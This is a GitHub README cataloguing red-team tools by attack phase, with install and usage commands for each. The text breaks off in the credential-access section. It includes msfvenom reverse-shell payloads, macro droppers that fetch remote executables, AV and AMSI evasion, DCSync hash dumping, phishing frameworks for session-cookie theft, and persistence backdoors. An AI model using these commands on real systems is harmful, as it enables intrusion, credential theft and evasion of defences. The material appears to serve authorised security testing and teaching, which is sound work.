Skip to content

Latest commit

 

History

History
2528 lines (1671 loc) · 88.3 KB

README-en.md

File metadata and controls

2528 lines (1671 loc) · 88.3 KB

RedTeam-Tools

This github repository contains a collection of 75+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

Warning

The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.

Note

Hide Tool List headings with the arrow.

Click 🔙 to get back to the list.

Tool List

Reconnaissance $\textcolor{gray}{\text{14 tools}}$
Resource Development $\textcolor{gray}{\text{5 tools}}$
Initial Access $\textcolor{gray}{\text{6 tools}}$
Execution $\textcolor{gray}{\text{8 tools}}$
Persistence $\textcolor{gray}{\text{3 tools}}$
Privilege Escalation $\textcolor{gray}{\text{8 tools}}$
Defense Evasion $\textcolor{gray}{\text{2 tools}}$
Credential Access $\textcolor{gray}{\text{4 tools}}$
Discovery $\textcolor{gray}{\text{4 tools}}$
Lateral Movement $\textcolor{gray}{\text{8 tools}}$
Collection $\textcolor{gray}{\text{2 tools}}$
    • BloodHound Active directory visualisation
    • Snaffler Active directory credential collector
Command and Control $\textcolor{gray}{\text{6 tools}}$
    • Havoc Command and control framework
    • Covenant Command and control framework (.NET)
    • Merlin Command and control framework (Golang)
    • Metasploit Framework Command and control framework (Ruby)
    • Pupy Command and control framework (Python)
    • Brute Ratel Command and control framework ($$$)
Exfiltration $\textcolor{gray}{\text{5 tools}}$
Impact $\textcolor{gray}{\text{1 tools}}$

Reconnaissance

🔙crt.sh -> httprobe -> EyeWitness

I have put together a bash one-liner that:

  • Passively collects a list of subdomains from certificate associations (crt.sh)
  • Actively requests each subdomain to verify it's existance (httprobe)
  • Actively screenshots each subdomain for manual review (EyeWitness)

Usage:

domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains

image

image

A JavaScript bookmarklet for extracting all webpage endpoint links on a page.

Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Usage (Bookmarklet)

Create a bookmarklet...

  • Right click your bookmark bar
  • Click 'Add Page'
  • Paste the above Javascript in the 'url' box
  • Click 'Save'

...then visit the victim page in the browser and click the bookmarklet.

image

Usage (Console)

Paste the above Javascript into the console window F12 and press enter.

image

Fast vulnerability scanner that uses .yaml templates to search for specific issues.

Install:

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Usage:

cat domains.txt | nuclei -t /PATH/nuclei-templates/

image

certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.

You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.

Install:

git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Usage:

python3 certSniff.py -f example.txt

image

Nice tool for brute forcing file/folder paths on a victim website.

Install:

sudo apt install gobuster

Usage:

gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

image

dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.

Install:

sudo apt install dnsrecon

Usage:

dnsrecon -d google.com

image

Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.

image

Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.

Install:

git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

Usage:

python3 AORT.py -d google.com

image

A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.

Domains are spoofable if any of the following conditions are met:

  • Lack of an SPF or DMARC record
  • SPF record never specifies ~all or -all
  • DMARC policy is set to p=none or is nonexistent

Install:

git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

Usage:

./spoofcheck.py [DOMAIN]

image

AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.

Install:

git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

Usage:

usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.

Install:

git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

Usage:

./githarvester.py

TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.

Install (Binaries): Link

Install (Go):

git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

Usage:

trufflehog https://github.com/trufflesecurity/test_keys

image

Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.

Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.

Install:

Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:

# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h

# Windows
dismap-0.3-windows-amd64.exe -h

Usage:

# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Image used from https://github.com/zhzyker/dismap

A tool for enumerating information from Windows and Samba systems.

It can be used to gather a wide range of information, including:

  • Domain and domain controller information
  • Local user and group information
  • Shares and share permissions
  • Security policies
  • Active Directory information

Install: (Apt)

sudo apt install enum4linux

Install: (Git)

git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Usage:

# 'Do everything'
enum4linux.pl -a 192.168.2.55

# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55

# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55

# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55

# Verbose scan 
enum4linux.pl -v 192.168.2.55

Full usage information can be found in this blog.

image

Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/

Resource Development

Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Install:

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Usage:

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.

Set Up Listener

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip 
set LPORT listening-port 
run

Msfvenom Commands

PHP:

msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙WSH

Creating payload:

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Execute:

wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted

🔙HTA

Creating payload:

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Execute: Run file

🔙VBA

Creating payload:

Sub calc()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

Execute: Set function to Auto_Open() in macro enabled document

Initial Access

The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.

hackinglab: Bash Bunny – Guide

Hak5 Documentation

Nice Payload Repo

Product Page

image

evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Install:

git clone https://github.com/fin3ss3g0d/evilgophish

Usage:

Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false

image

This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.

Install:

git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Usage:

python3 setoolkit

image

Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc.

Install:

sudo apt install hydra

Usage:

hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

image

SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).

Attack Steps:

  • Send malicious QR code to victim
  • Victim scans QR code with mobile device
  • Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
  • Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
  • Attacker polls for authentication
  • Victim enters code into legit Microsoft website
  • Attacker saves authentication token

Install:

git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Note: Before using either module, update the required information in the settings.config file noted with Required.

Usage (Email Module):

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

Usage (Server Module):

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.

It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.

Install (Linux - Client & Server):

wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash ./install.sh

Usage:

Once King Phisher has been installed please follow the wiki page to setup SSH, Database config, SMTP server etc.

image

Execution

Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.

The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network.

Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.

Install:

git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Usage:

# Running the tool
./Responder.py [options]

# Typical usage
./Responder.py -I eth0 -wrf

Full usage information can be found here.

image

Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.

It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:

  • Password hashes for local accounts
  • Kerberos tickets and keys
  • LSA Secrets

Install:

python3 -m pip install impacket

Usage:

# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# DCSync attack and dump the NTLM hashes of all domain users.
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

image

Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy

Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: A service that allows administrators to remotely execute commands on a Windows machine).

Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.

Some features include:

  • Loading in memory Powershell scripts
  • Loading in memory dll files bypassing some AVs
  • Loading x64 payloads
  • Pass-the-hash support
  • Uploading and downloading local and remote files

Install: (Git)

sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Install: (Ruby gem)

gem install evil-winrm

Alternative installation instructions can be found here.

Usage:

# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Full usage documentation can be found here.

image

Image used from https://korbinian-spielvogel.de/posts/heist-writeup/

A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.

Install: (Windows)

git clone http://github.com/thewover/donut.git

To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:

nmake -f Makefile.msvc

To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:

make -f Makefile.mingw

Install: (Linux)

pip3 install donut-shellcode

Usage:

# Creating shellcode from an XSL file that pops up a calculator.
shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl")

# Creating shellcode from an unmanaged DLL. Invokes DLLMain.
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

For full usage information, see the donut GitHub Page.

See a recent blog post from The Wover for more info.

image

A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.

Install: (Binary)

  1. Get the latest binary from https://github.com/sevagas/macro_pack/releases/
  2. Download binary on PC with genuine Microsoft Office installed.
  3. Open console, CD to binary dir and call the binary

Install: (Git)

git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Usage:

# Help Page
python3 macro_pack.py  --help

# List all supported file formats
macro_pack.exe --listformats

# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

# Obfuscate Empire stager VBA file and generate a MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm

# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 

# Execute calc.exe via Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xslx

image

A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.

Some of the features of PowerSploit:

  • Dump password hashes and extract clear-text passwords from memory
  • Escalate privileges and bypass security controls
  • Execute arbitrary PowerShell code and bypass execution restrictions
  • Perform network reconnaissance and discovery
  • Generate payloads and execute exploits

Install: 1. Save to PowerShell modules folder

First you will need to download the PowerSploit Folder and save it to your PowerShell modules folder.

Your PowerShell modules folder path can be found with the following command:

$Env:PSModulePath

Install: 2. Install PowerSploit as a PowerShell module

You will then need to install the PowerSploit module (use the name of the downloaded folder).

Note: Your PowerShell execution policy might block you, to fix this run the following command.

powershell.exe -ep bypass

Now you can install the PowerSploit module.

Import-Module PowerSploit

Usage:

Get-Command -Module PowerSploit

image

A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.

Some of the features of Rubeus:

  • Kerberoasting
  • Golden ticket attacks
  • Silver ticket attacks

Install: (Download)

You can install the unofficial pre-compiled Rubeus binary here.

Install: (Compile)

Rubeus is compatible with Visual Studio 2019 Community Edition. Open the rubeus project .sln, choose "Release", and build.

Usage:

Rubeus.exe -h

image

A nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.

Install: (Download)

You can install the unofficial pre-compiled SharpUp binary here.

Install: (Compile)

SharpUp is compatible with Visual Studio 2015 Community Edition. Open the SharpUp project .sln, choose "Release", and build.

Usage:

SharpUp.exe audit
#-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths
#-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths
#-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

image

Persistence

Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.

It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.

Install:

python3 -m pip install impacket

Install: (With Example Scripts)

Download and extract the package, then navigate to the install folder and run...

python3 -m pip install .

Usage:

# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Gets a list of the sessions opened at the remote hosts
netview.py domain/user:password -target 192.168.10.2

# Retrieves the MSSQL instances names from the target host.
mssqlinstance.py 192.168.1.2

# This script will gather data about the domain's users and their corresponding email addresses.
GetADUsers.py domain/user:password@IP

Great cheat sheet for Impacket usage.

image

Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.

Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.

Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.

Install:

git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Usage:

# Start Empire
./empire

# List live agents
list agents

# List live listeners
list listeners

Nice usage cheat sheet by HarmJoy.

image

A Windows persistence toolkit written in C#.

The project has a wiki.

Install: (Binary)

You can find the most recent release here.

Install: (Compile)

  • Download the project files from the GitHub Repo.
  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL "https://api.nuget.org/v3/index.json"
  • Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.
    • Install-Package Costura.Fody -Version 3.3.3
  • Install the TaskScheduler package
    • Install-Package TaskScheduler -Version 2.8.11
  • You can now build the project yourself!

Usage:

A full list of usage examples can be found here.

#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

Privilege Escalation

LinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints.

Install + Usage:

curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

image

WinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints.

Install + Usage:

$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

Linux smart enumeration is another good, less verbose, linux privesc tool for Linux.

Install + Usage:

curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

image

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.

Key features of Certify:

  • Certificate creation
  • Certificate signing
  • Certificate import
  • Certificate trust modification

Install: (Compile)

Certify is compatible with Visual Studio 2019 Community Edition. Open the Certify project .sln, choose "Release", and build.

Install: (Running Certify Through PowerShell)

If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

[Certify.Program]::Main("find /vulnerable".Split())

Full compile instructions can be found here.

Usage:

# See if there are any vulnerable templates
Certify.exe find /vulnerable

# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

Full example walkthrough can be found here.

image

Get-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).

Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.

Install:

Follow the PowerSploit installation instructions from this tool sheet.

powershell.exe -ep bypass
Import-Module PowerSploit

Usage:

# Get all passwords with additional information
Get-GPPPassword

# Get list of all passwords
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

image

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Supports:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

Install: (PowerShell)

# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Usage: (PowerShell)

# Run all functions
Find-AllVulns

# Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)
Find-MS14058

image

Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.

Install:

Using Visual Studio 2019 Community Edition. Open the Watson project .sln, choose "Release", and build.

Usage:

# Run all checks
Watson.exe

image

Image text used from https://github.com/rasta-mouse/Watson#usage

A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.

The discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.

Install:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • Custom Confirmatory DLL's :
    • These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path
    • Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)
    • 32Bit dll name should be: maldll32.dll
    • 64Bit dll name should be: maldll64.dll
    • Install NuGet Package:** PeNet** -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)

Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.

  • Build and Setup Information:

    • ImpulsiveDLLHijack

      • Clone the repository in Visual Studio
      • Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Build the project!
      • The ImpulsiveDLLHijack.exe will be inside the bin directory.
    • And for Confirmatory DLL's:

      • Clone the repository in Visual Studio
      • Build the project with x86 and x64
      • Rename x86 release as maldll32.dll and x64 release as maldll64.dll
    • Setup: Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))

Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Usage:

# Help
ImpulsiveDLLHijack.exe -h

# Look for vulnerabilities in an executable 
ImpulsiveDLLHijack.exe -path BINARY_PATH

Usage examples can be found here.

image

Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples

Defense Evasion

A PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.

Install:

git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

Usage:

./Invoke-Obfuscation

image

Veil is a tool for generating metasploit payloads that bypass common anti-virus solutions.

It can be used to generate obfuscated shellcode, see the official veil framework blog for more info.

Install: (Kali)

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

Install: (Git)

sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Usage:

# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-payloads

# List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-encoders

# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

# List all payloads (–list-payloads) for the tool Evasion (-t Evasion)
./Veil.py -t Evasion --list-payloads

# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris
./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

Veil creators wrote a nice blog post explaining further ordnance and evasion command line usage.

image

Credential Access

Great tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.

Install:

  1. Download the mimikatz_trunk.7z file.
  2. Once downloaded, the mimikatz.exe binary is in the x64 folder.

Usage:

.\mimikatz.exe
privilege::debug

image

Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.

Install: (Binary)

You can install the standalone binary from here.

Usage:

# Launch all modes
.\laZagne.exe all

# Launch only a specific module
